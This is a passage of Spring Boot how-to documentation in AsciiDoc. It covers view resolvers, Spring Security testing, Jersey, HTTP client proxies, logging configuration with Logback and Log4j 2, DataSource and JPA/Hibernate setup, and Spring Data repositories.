by\nproviding a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the\nview resolver chain and picks up any beans with the same name as the `View` being\nresolved. 
It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. 
You can override `GroovyMarkupViewResolver` by providing a bean of the
same name.

For more detail, see the following sections:

* {sc-spring-boot-autoconfigure}/web/servlet/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/thymeleaf/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/freemarker/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]
* {sc-spring-boot-autoconfigure}/groovy/template/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]



[[howto-use-test-with-spring-security]]
== Testing With Spring Security
Spring Security provides support for running tests as a specific user.
For example, the test in the snippet below will run with an authenticated user
that has the `ADMIN` role.

[source,java,indent=0]
----
	@Test
	@WithMockUser(roles="ADMIN")
	public void requestProtectedUrlWithUser() throws Exception {
		mvc
			.perform(get("/"))
			...
	}
----

Spring Security provides comprehensive integration with Spring MVC Test, and this
support can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.

For additional details on Spring Security's testing support, refer to Spring Security's
https://docs.spring.io/spring-security/site/docs/current/reference/htmlsingle/#test[reference documentation].



[[howto-jersey]]
== Jersey



[[howto-jersey-spring-security]]
=== Secure Jersey Endpoints with Spring Security
Spring Security can be used to secure a Jersey-based web application in much the same
way as it can be used to secure a Spring MVC-based web application. However, if you want
to use Spring Security's method-level security with Jersey, you must configure Jersey to
use `setStatus(int)` rather than `sendError(int)`. This prevents Jersey from committing the
response before Spring Security has had an opportunity to report an authentication or
authorization failure to the client.

The `jersey.config.server.response.setStatusOverSendError` property must be set to `true`
on the application's `ResourceConfig` bean, as shown in the following example:

[source,java,indent=0]
----
include::{code-examples}/jersey/JerseySetStatusOverSendErrorExample.java[tag=resource-config]
----



[[howto-http-clients]]
== HTTP Clients

Spring Boot offers a number of starters that work with HTTP clients. This section answers
questions related to using them.

[[howto-http-clients-proxy-configuration]]
=== Configure RestTemplate to Use a Proxy
As described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,
you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized
`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured
to use a proxy.

The exact details of the proxy configuration depend on the underlying client request
factory that is being used. The following example configures
`HttpComponentsClientHttpRequestFactory` with an `HttpClient` that uses a proxy for all hosts
except `192.168.0.5`:

[source,java,indent=0]
----
include::{code-examples}/web/client/RestTemplateProxyCustomizationExample.java[tag=customizer]
----



[[howto-logging]]
== Logging

Spring Boot has no mandatory logging dependency, except for the Commons Logging API, which
is typically provided by Spring Framework's `spring-jcl` module.
To use
http://logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.
The simplest way to do that is through the starters, which all depend on
`spring-boot-starter-logging`. For a web application, you need only
`spring-boot-starter-web`, since it depends transitively on the logging starter. If you
use Maven, the following dependency adds logging for you:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-web</artifactId>
	</dependency>
----

Spring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on
the content of the classpath. If Logback is available, it is the first choice.

If the only change you need to make to logging is to set the levels of various loggers,
you can do so in `application.properties` by using the "logging.level" prefix, as shown
in the following example:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	logging.level.org.springframework.web=DEBUG
	logging.level.org.hibernate=ERROR
----

You can also set the location of a file to which to write the log (in addition to the
console) by using "logging.file".

To configure the more fine-grained settings of a logging system, you need to use the native
configuration format supported by the `LoggingSystem` in question. By default, Spring Boot
picks up the native configuration from its default location for the system (such as
`classpath:logback.xml` for Logback), but you can set the location of the config file by
using the "logging.config" property.



[[howto-configure-logback-for-logging]]
=== Configure Logback for Logging
If you put a `logback.xml` in the root of your classpath, it is picked up from there (or
from `logback-spring.xml`, to take advantage of the templating features provided by
Boot). Spring Boot provides a default base configuration that you can include if you
want to set levels, as shown in the following example:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
		<include resource="org/springframework/boot/logging/logback/base.xml"/>
		<logger name="org.springframework.web" level="DEBUG"/>
	</configuration>
----

If you look at `base.xml` in the spring-boot jar, you can see that it uses
some useful System properties that the `LoggingSystem` takes care of creating for you:

* `${PID}`: The current process ID.
* `${LOG_FILE}`: Set to the value of `logging.file` if it was set in Boot's external
 configuration.
* `${LOG_PATH}`: Set to the value of `logging.path` (representing a directory for
 log files to live in) if it was set in Boot's external configuration.
* `${LOG_EXCEPTION_CONVERSION_WORD}`: Set to the value of `logging.exception-conversion-word`
 if it was set in Boot's external configuration.

Spring Boot also provides some nice ANSI color terminal output on a console (but not in
a log file) by using a custom Logback converter. See the default `base.xml` configuration
for details.

If Groovy is on the classpath, you should be able to configure Logback with
`logback.groovy` as well.
If present, this setting is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). 
See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. 
Check the implementation that\nis going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (because the `DataSource` interface exposes no properties). Also, if\nyou happen to have Hikari on the classpath, this basic setup does not work, because Hikari\nhas no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You cannot change the implementation\nat runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is,\nby providing a default embedded database with a sensible username and password if no URL\nis provided. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` object, so you could also inject the DataSource that Spring Boot\ncreates automatically. However, that would split your configuration into two namespaces:\n`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on\nyour custom namespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the\n`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking\ncare of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`. This\nexample uses a more generic `configuration` sub namespace as the example does not support\nmultiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nhas no effect. 
In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. 
To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime\nconditions, it has different defaults. If an embedded database is used and no schema\nmanager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. In all other cases, it defaults to `none`.\n\nThe dialect to use is also automatically detected based on the current `DataSource`, but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect`, and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate\nfigure things out or set the dialect by setting the `spring.jpa.database-platform`\nproperty.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal\nJPA properties (with the prefix stripped) when the local `EntityManagerFactory` is\ncreated.\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider\nregistering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating\nthe `EntityManagerFactory`. This takes precedence to anything that is applied by the\nauto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-documentation}#naming[two different naming strategies] to map\nnames from the object model to the corresponding database names. The fully qualified\nclass name of the physical and the implicit strategy implementations can be configured by\nsetting the `spring.jpa.hibernate.naming.physical-strategy` and\n`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,\nif `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the\napplication context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with\n`SpringPhysicalNamingStrategy`. 
This implementation provides the same table structure as\nHibernate 4: all dots are replaced by underscores and camel casing is replaced by\nunderscores as well. By default, all table names are generated in lower case, but it is\npossible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-documentation}#caching[second-level cache] can be configured for a\nrange of cache providers. Rather than configuring Hibernate to lookup the cache provider\nagain, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy. First, make sure that\n`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a\n`HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that\nthe application uses. It is also possible to use separate `CacheManager` instances. For\ndetails, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user\nguide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the\n`BeanFactory` so that converters and entity listeners can use regular dependency\ninjection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`\nthat removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the\ndefault. To make it easy to do, you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot. 
Alternatively, you can just the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture, you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of\nthem as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring\nBoot. The other would have to be explicitly injected into a new instance. Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). 
To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. 
